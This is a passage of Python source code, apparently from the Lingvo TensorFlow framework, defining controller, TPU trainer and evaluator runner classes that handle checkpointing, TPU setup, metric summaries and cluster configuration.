'tpu', None,
'The Cloud TPU on GCP to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url. If set, other cluster parameters (such as --cluster_spec) will be '
'configured automatically with TPUClusterResolver.')
tf.flags.DEFINE_string(
'gcp_project', None,
'Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
tf.flags.DEFINE_string(
'tpu_zone', None,
'GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
# Please consider adding model params instead of adding flags.
FLAGS = tf.flags.FLAGS
# useful for debugging.
def _StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if py_utils.IsEagerMode():
raise RuntimeError('The controller job is not supported in eager mode.')
self._job_name = 'controller'
assert not self._model_task_name, 'Controller needs all tasks!'
self._control_dir = os.path.join(self._logdir, 'control')
tf.io.gfile.makedirs(self._control_dir)
self._checkpoint_in_controller = True
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpoint_in_controller = False
if self._early_stop:
tf.logging.warning('Controller ignoring early_stop since '
'TrainerTpu is driving training.')
self._early_stop = None
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._summary_op = tf.summary.merge_all()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
if self._checkpoint_in_controller:
self.checkpointer = self._CreateCheckpointer(
self._train_dir,
self._model,
init_op=self._initialize_global_vars)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = summary_utils.ModelAnalysis(
self._model, FLAGS.inspect_model_topn, FLAGS.inspect_model_part_regex)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
self._WriteToLog(
text_format.MessageToString(self.params.ToProto(), as_utf8=True),
self._control_dir, 'params.pbtxt')
self._summary_writer.add_graph(self._graph)
def _CreateCheckpointer(self, train_dir, model, init_op=None):
"""Wrapper method for override purposes."""
return checkpointer.Checkpointer(train_dir, model, init_op)
def Start(self):
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
with tf.container(self._container_id), self._GetSession() as sess:
if FLAGS.interactive:
# Into interactive debugging mode.
_StartShell(locals())
return
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
for task in self._model.tasks:
task.input.Initialize(sess)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
summary_interval_steps = tp.summary_interval_steps
save_interval_seconds = tp.save_interval_seconds
next_summary_step = 1
if not self._checkpoint_in_controller:
global_step = self._WaitUntilInit(sess)
while True:
now = time.time()
next_iteration_seconds = now + min(
10, save_interval_seconds) # 10 seconds or less
if self._checkpoint_in_controller:
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
global_step = sess.run(self._model.global_step)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
if self._checkpoint_in_controller:
self.checkpointer.Save(sess, global_step)
sess.close()
self._DequeueThreadComplete()
return
if self._checkpoint_in_controller:
# Checkpoint if it's time.
self.checkpointer.MaybeSave(sess, global_step)
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
global_step, summary_str = sess.run(
[self._model.global_step, self._summary_op])
next_summary_step = global_step + summary_interval_steps
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
tf.logging.info('Write summary @%s', global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
tf.logging.info('Write summary done: step %d', global_step)
now = time.time()
if now < next_iteration_seconds:
time.sleep(next_iteration_seconds - now)
def _SummarizeValue(self, step, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), step)
Trainer = trainer_impl.Trainer
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'trainer_tpu'
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
self._step_rate_tracker = summary_utils.StepRateTracker()
self._compile_op = None
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitUntilInitTpu():
"""Wait until the model is ready."""
try:
# tpu.initialize_system() is called with None as embedding_config, as
# embedding_config is not available yet. Later in _Loop, it is called
# with the correct embedding_config. Since it cannot be called twice in
# the same graph with different embedding_config, we use a dummy_graph
# here.
dummy_graph = tf.Graph()
with dummy_graph.as_default():
tpu_initialize_system_op = tf.tpu.initialize_system(
embedding_config=None, job=None)
with self._GetSession(graph=dummy_graph) as sess:
topology = sess.run(tpu_initialize_system_op)
if self.params.train.tpu_computation_shape is None:
computation_shape = py_utils.ComputationShape(num_devices_per_split,
topology)
else:
computation_shape = self.params.train.tpu_computation_shape
assert num_devices_per_split == np.prod(computation_shape)
if self.params.train.tpu_device_order_mode is None:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism)
else:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism,
device_order_mode=self.params.train.tpu_device_order_mode)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitUntilInitTpu()
with self._graph.as_default(), tf.container(
self._container_id), contextlib.ExitStack() as stack:
if FLAGS.pdb_on_exception:
stack.enter_context(pdb_wrapper.catch_post_mortem())
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
self._CreateTF2SummaryWriter(self._train_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._task = self._model.GetTask()
self._task.input.TpuSetup()
self._eval_metrics = metrics.TpuEvalMetrics()
# Needed due to the AddExtraTheta() reference to global_step when
# instantiating the InputGenerator.
_ = py_utils.GetOrCreateGlobalStepVar()
self._CreateTF2SummaryOps()
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model.ConstructFPropBPropGraph()
tpu_embedding_collection = (
tpu_embedding_layers.TpuEmbeddingCollection.Get())
self._load_ops = tpu_embedding_collection.load_ops
self._retrieve_ops = tpu_embedding_collection.retrieve_ops
self._tpu_embedding = tpu_embedding_collection.tpu_embedding
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._task.eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(self._task.per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._task.train_op]
@tpu_function.on_device_training_loop
def TpuTrain():
loop_result = tpu_training_loop.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
self._compile_op, batch_parallel_res = tpu.split_compile_and_shard(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._task.per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
def _ConstructPostTrainingLoop(train_loop_op, outfeed_dequeue_op):
"""Returns the op for tpu training with tail cpu computation."""
# Adds a tail computation that is run after the tpu_training loop
# step finishes. This allows us to run certain computation that
# acts on the variable between tpu_train_loop iterations and
# amortizing the cost of the operations. Alternative of running
# tpu.outside_compilation & using tf.cond is expensive.
with tf.control_dependencies(train_loop_op):
self._model.ConstructPostTrainingLoop(outfeed_dequeue_op)
with tf.control_dependencies([self._task.post_training_loop_op]):
return ([[tf.identity(o) for o in train_loop_op],
outfeed_dequeue_op])
# Get metric result from a single replica; they are all same here.
all_tpu_ops = [t[0] for t in batch_parallel_res]
self._tpu_train_ops = (
_ConstructPostTrainingLoop(all_tpu_ops, outfeed_dequeue_op))
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self._initialize_tables = tf.tables_initializer()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer = checkpointer.Checkpointer(
self._train_dir, self._model, init_op=self._initialize_global_vars)
self.enqueue_ops = self._task.input.tpu_infeed_op
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
if self._task.input.input_data_summary_layout is not None:
self._summary_writer.add_summary(
self._task.input.input_data_summary_layout)
if FLAGS.checkpoint_in_trainer_tpu:
self._model_analysis, self._total_num_params = (
summary_utils.ModelAnalysis(self._model, FLAGS.inspect_model_topn,
FLAGS.inspect_model_part_regex))
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._train_dir,
'model_analysis.txt')
# Saves the trainer params.
self._WriteToLog(self.params.ToText(), self._train_dir,
'trainer_params.txt')
def _GetSession(self, **kwargs):
return super()._GetSession(cluster_def=self._worker_cluster_def, **kwargs)
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
for replica in range(device_assignment.num_replicas):
for core in range(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tpu_ops.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = [
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
]
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def _CleanUp(self):
# If there's an exception, we want _LoopEnqueue to wait until
# everything is initialized before starting up.
self._initialized.clear()
def Start(self):
# Run training.
self._RunLoop('trainer', self._Loop, cleanup_func=self._CleanUp)
def _InfeedLoop(self, sess):
tf.logging.info('_InfeedLoop start')
for _ in range(self._steps_per_loop):
sess.run(self.enqueue_ops)
def StartEnqueueOp(self, op):
# When retrieve ops for TPU embedding is present, we use _InfeedLoop above
# instead to make sure enqueue and retrieve does not happen at the same
# time as required by TPU embedding.
# We can remove this by using a tf.while_loop driven infeed op.
if self._retrieve_ops:
return
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
tf.logging.info('_LoopEnqueue waiting for _initialized...')
self._initialized.wait()
tf.logging.info('_LoopEnqueue proceeding.')
# The global step may not be initialized in this thread if the target server
# uses session state isolation (e.g. Cloud TPUs).
sess = self._GetSession()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.RestoreGlobalStepIfNeeded(sess)
# Get merged summary op for training related input data stats from the
# tasks's input generator.
self._merged_input_data_summary_op = (
self._task.input.merged_input_data_summary_op)
return super()._LoopEnqueue(op, sess)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
self._DequeueThreadComplete()
return
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
config_proto = (
self._tpu_embedding.config_proto
if self._tpu_embedding is not None else None)
sess.run(
tf.tpu.initialize_system(embedding_config=config_proto, job=None))
sess.run(self._initialize_tables)
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
if FLAGS.run_locally == 'tpu':
sess.run(self._initialize_global_vars)
self._SetStatusMessage('Compiling ...')
compilation_result = sess.run(self._compile_op)
comp_result_proto = tpu_compilation_result.CompilationResultProto()
comp_result_proto.ParseFromString(compilation_result)
if comp_result_proto.status_error_message:
tf.logging.fatal('Compilation failed: {}'.format(
comp_result_proto.status_error_message))
self._SetStatusMessage('Compiling done.')
if FLAGS.checkpoint_in_trainer_tpu:
# For b/134415393 -- better to initialize to a known state than
# rely on what's in the session on the trainer/TPU worker.
tf.logging.info('TrainerTpu: Force restore or initialize.')
self.checkpointer.Restore(sess, force_reinitialize=True)
global_step = sess.run(self._model.global_step)
self._initialized.set()
eval_metrics = None
if FLAGS.checkpoint_in_trainer_tpu and global_step == 0:
# Always save a ckpt at step 0.
self.checkpointer.MaybeSave(sess, global_step)
sess.run(self._load_ops)
while True:
train_steps_start = time.perf_counter()
if FLAGS.checkpoint_in_trainer_tpu:
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
if self._trial.ShouldStopAndMaybeReport(
global_step, eval_metrics) or self._ShouldEarlyStop(sess):
# Early terminate gracefully by setting a new max step horizon: three
# more TPU steps to ensure that the enqueue ops can gracefully
# terminate as well. Otherwise, the enqueue thread may be stuck, e.g.,
# when the queue is filled and the enqueue thread is blocked when
# pushing new data to the queue, if the trainer thread decides to
# early stop (i.e., `self._ShouldEarlyStop(sess)` is true), then the
# enqueue thread could be blocked forever as the trainer thread would
# never consume any new data from the queue. After setting the new
# max step horizon, the trainer thread would continue run for 3 loops
# (3K global steps usually), so the enqueue thread could get a chance
# to move forward and run `_ShouldStop()` to stop gracefully.
if self._max_steps_for_early_stop is None:
self._max_steps_for_early_stop = global_step + 3 * self._steps_per_loop
tf.logging.info('Early stopping at step: %d',
self._max_steps_for_early_stop)
if self._ShouldStop(sess, global_step, check_early_stop=False):
tf.logging.info('Training finished.')
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.Save(sess, global_step)
self._DequeueThreadComplete()
return
if self._retrieve_ops:
infeed_loop_thread = threading.Thread(
target=self._InfeedLoop, args=(sess,))
infeed_loop_thread.start()
tpu_train_op_start = time.perf_counter()
values, outfeeds = sess.run(self._tpu_train_ops)
tpu_train_op_secs = time.perf_counter() - tpu_train_op_start
if self._retrieve_ops:
infeed_loop_thread.join()
tf.logging.info('Retrieve params.')
sess.run(self._retrieve_ops)
tf.logging.info('Retrieve params done.')
self._eval_metrics.PackMetricsValues(values)
eval_metrics = self._eval_metrics.metrics
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
task_global_step = sess.run(self._task.global_step)
global_step = sess.run(self._model.global_step)
if not self._task.per_example_tensors:
outfeeds = {}
self._task.ProcessFPropResults(sess, task_global_step, eval_metrics,
outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
step_rate, example_rate, total_examples = (
self._step_rate_tracker.ComputeStepRate(
global_step,
eval_metrics['num_samples_in_batch'][0] * self._steps_per_loop))
self._RunTF2SummaryOps(sess)
self._SummarizeValue(global_step, 'global_step/sec', step_rate)
self._SummarizeValue(global_step, 'examples/sec', example_rate)
self._SummarizeValue(global_step, 'total_samples', total_examples)
if FLAGS.checkpoint_in_trainer_tpu:
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
msg = 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (
global_step, step_rate, example_rate)
for key, (val, _) in sorted(eval_metrics.items()):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
# Add model eval metrics to early stop metric history.
for metric_name, (metric_value, _) in eval_metrics.items():
self._UpdateEarlyStopMetric('train', global_step, metric_name,
metric_value)
checkpoint_write_secs = 0.0
if FLAGS.checkpoint_in_trainer_tpu:
checkpoint_write_start = time.perf_counter()
checkpoint_saved = self.checkpointer.MaybeSave(sess, global_step)
if checkpoint_saved:
checkpoint_write_secs = time.perf_counter() - checkpoint_write_start
train_steps_secs = time.perf_counter() - train_steps_start
self._ExportMetrics(
# Metrics expects python int, but global_step is numpy.int64.
global_step=int(global_step),
step_rate=step_rate,
example_rate=example_rate,
tpu_train_op_secs=tpu_train_op_secs,
checkpoint_write_secs=checkpoint_write_secs,
total_train_steps_secs=train_steps_secs,
**{k: v[0] for k, v in eval_metrics.items()})
class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self._export = eval_type == 'train'
if not self._export:
tf.logging.info(f'Job {self._job_name} will not export the model.')
self.params.cluster.do_eval = True
self._cluster = cluster_factory.Cluster(self.params.cluster)
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.io.gfile.makedirs(self._eval_dir)
self._eval_path = None
# Multitask params doesn't have 'task'.
if 'task' in self.params:
self._eval_path = checkpointer.GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._should_report_metrics = self._job_name.startswith(
self._cluster.reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._CreateTF2SummaryWriter(self._eval_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropGraph()
self._task = self._model.GetTask(self._model_task_name)
self.checkpointer = self._CreateCheckpointer(self._train_dir,
self._model)
self._CreateTF2SummaryOps()
self._summary_op = tf.summary.merge_all()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.io.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def _CreateCheckpointer(self, train_dir, model):
"""Wrapper method for override purposes."""
return checkpointer.Checkpointer(train_dir, model)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
self._task.input.Initialize(sess)
if self._eval_path:
self._EvalOnce(sess, self._eval_path)
self._UpdateProcessedCheckpoints(self._eval_dir, self._eval_path)
elif self._task.params.eval.eval_all_checkpoints:
self._RunOnAllCheckpoints(sess, self._EvalOnce, self._eval_dir)
else:
self._RunOnLatestCheckpoints(sess, self._EvalOnce, self._eval_dir)
if self._should_report_metrics:
tf.logging.info('Reporting trial done.')
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(sess, path)
def EvalCheckpoint(self, ckpt_id):
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = '{}/ckpt-{:08d}'.format(self._train_dir, ckpt_id)
self._EvalOnce(sess, path)
def _RemoveScalarSummaries(self, summaries):
proto = summary_pb2.Summary()
proto.ParseFromString(summaries)
for i, value in enumerate(proto.value):
if value.WhichOneof('value') == 'simple_value':
del proto.value[i]
return proto.SerializeToString()
def _EvalOnce(self, sess, path):
"""Runs evaluation for a batch of samples.
Args:
sess: the tf Session.
path: checkpoint path.
"""
if not FLAGS.evaler_in_same_address_as_controller:
self.checkpointer.RestoreFromPath(sess, path)
global_step = sess.run(py_utils.GetGlobalStep())
# Save any additional information to disk before evaluation.
if self._export:
self._task.Export(path)
# Check after how many steps checkpoint got saved.
# And decide whether to run an evaluation.
if global_step < self._task.params.eval.start_eval_after:
return
if self._task.input.params.resettable:
tf.logging.info('Resetting input_generator.')
self._task.input_generator.Reset(sess)
metrics_dict = {
name: metrics.AverageMetric() for name in self._task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
samples_per_summary = self._task.params.eval.samples_per_summary
if samples_per_summary == 0:
assert self._task.input.params.resettable
while samples_per_summary == 0 or (num_samples_metric.total_value <
samples_per_summary):
try:
is_first_loop = num_samples_metric.total_value == 0
# NOTE: We intentionally do not let FProp generate scalar summaries by
# default, because evaler calls FProp multiple times for each
# checkpoint. Multiple summaries at the same step is often confusing.
# Instead, models should update eval_metrics and generate aggregate
# summaries. Other types of summaries (images, audio etc.) will be
# generated for the first eval batch.
if self._summary_op is not None and is_first_loop:
ans, summaries = sess.run([self._task.eval_metrics, self._summary_op])
summaries = self._RemoveScalarSummaries(summaries)
# Add non-scalar summaries only for the first batch of data.
self._summary_writer.add_summary(summaries, global_step)
self._summary_writer.flush()
else:
ans = sess.run(self._task.eval_metrics)
for name, (value, weight) in ans.items():
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value, samples_per_summary)
except tf.errors.OutOfRangeError:
if not self._task.input.params.resettable:
raise
break
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
self._RunTF2SummaryOps(sess)
summaries = {k: v.Summary(k) for k, v in metrics_dict.items()}
summaries['total_samples'] = metrics.CreateScalarSummary(
'total_samples', num_samples_metric.total_value)
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step,
summaries,
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
# Get merged summaries for input data stats logged by the tasks's input
# generator and write summaries for the stats.
if self._task.input.merged_input_data_summary_op is not None:
input_stats_summary_str = sess.run(
self._task.input.merged_input_data_summary_op)
self._WriteInputDataStatSummaries(input_stats_summary_str, global_step)
if self._should_report_metrics:
tf.logging.info('Reporting eval measure for step %d.' % global_step)
self._trial.ReportEvalMeasure(global_step, metrics_dict, path)
Decoder = trainer_impl.Decoder
GetDecoderDir = trainer_impl.GetDecoderDir
def _GetClusterSpecDict():
"""Parses the cluster_spec flag and returns a dict."""
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
raise ValueError(f'Invalid job specification: {job_spec}')
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
return cluster_spec_dict
class RunnerManager:
"""Helper class for managing runners."""
# This is a hack so these classes can be overridded with internal
# non-public implementations.
# pylint: disable=invalid-name
inference_graph_exporter = inference_graph_exporter
model_registry = model_registry
Controller = Controller
Trainer = Trainer
TrainerTpu = TrainerTpu
Evaler = Evaler
Decoder = Decoder
ExecutorTpu = executor.ExecutorTpu
# pylint: enable=invalid-name
def __init__(self, model):
self._model_name = model
def MaybeLaunchTensorFlow(self):
"""Starts TF machinery in this process."""
if FLAGS.run_locally or FLAGS.tpu:
return
tf.logging.info('Launching tensorflow.')
target = FLAGS.tf_master
if not target.startswith('localhost'):
# E.g., trainer_client is configured w/ FLAGS.tf_master pointing to
# another job. In that case, start a local server.
cluster_spec_dict = _GetClusterSpecDict()
self._tf_server = tf.distribute.Server(
tf.train.ClusterSpec(cluster_spec_dict),
job_name=FLAGS.job,
task_index=FLAGS.task)
target = self._tf_server.target
if not FLAGS.tf_master:
FLAGS.tf_master = target
with tf.Session(target).as_default():
value = (tf.constant(1.) + tf.constant(1.)).eval()
assert value == 2.0, 'Something is really wrong.'
tf.logging.info('Launched tensorflow.')
def GetExecutorParams(self):
"""Get the params needed to instantiate the ExecutorTpu.
Returns:
Tuple (dict, params):
- ps_params_dict: high_level task_name -> ProgramScheduleParams
- train_cfg: Either a SingleTaskModelParams or MultiTaskModelParams.
"""
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, 'executor_tpu')
ps_params_dict, train_cfg = executor.GetExecutorParams(
self._model_name, cluster.params, self.model_registry)
return ps_params_dict, train_cfg
def GetParamsForDataset(self, job_name, dataset_name):
"""Returns params for job `job_name` on the dataset `dataset_name`."""
# Get the current cluster and update its params from flags.
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, job_name)
with cluster_factory.Cluster(cluster.params):
try:
cfg = self.model_registry.GetParams(self._model_name, dataset_name)
except base_model_params.DatasetError as e:
dataset_name_retry = dataset_name.title()
tf.logging.warning(
'Exception configuring dataset %s, retrying as %s: %s',
dataset_name, dataset_name_retry, e)
cfg = self.model_registry.GetParams(self._model_name,
dataset_name_retry)
tf.logging.warning('Succeeded after retrying as %s.' %
dataset_name_retry)
cfg.cluster = cluster.params
# Updates a few params based on flags.
if FLAGS.enqueue_max_steps is not None:
cfg.train.enqueue_max_steps = FLAGS.enqueue_max_steps
if FLAGS.saver_max_to_keep is not None:
cfg.train.save_max_to_keep = FLAGS.saver_max_to_keep
if FLAGS.saver_keep_checkpoint_every_n_hours is not None:
cfg.train.save_keep_checkpoint_every_n_hours = FLAGS.saver_keep_checkpoint_every_n_hours
return cfg
def MaybeConfigRunDistributed(self):
"""If given a `FLAGS.cluster_spec`, update flags for running distributed."""
if not FLAGS.cluster_spec:
return
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = _GetClusterSpecDict()
if FLAGS.job == 'trainer_client':
FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task]
for job in cluster_spec_dict:
if job.startswith('decoder_'):
assert len(job_specs) == 1, 'Decoder jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.decoder_job = '/job:%s' % job
FLAGS.decoder_replicas = 1
if job.startswith('evaler_'):
assert len(job_specs) == 1, 'Evaler jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.evaler_job = '/job:%s' % job
FLAGS.evaler_replicas = 1
if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client',
'worker', 'executor_tpu'):
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = len(cluster_spec_dict['worker'])
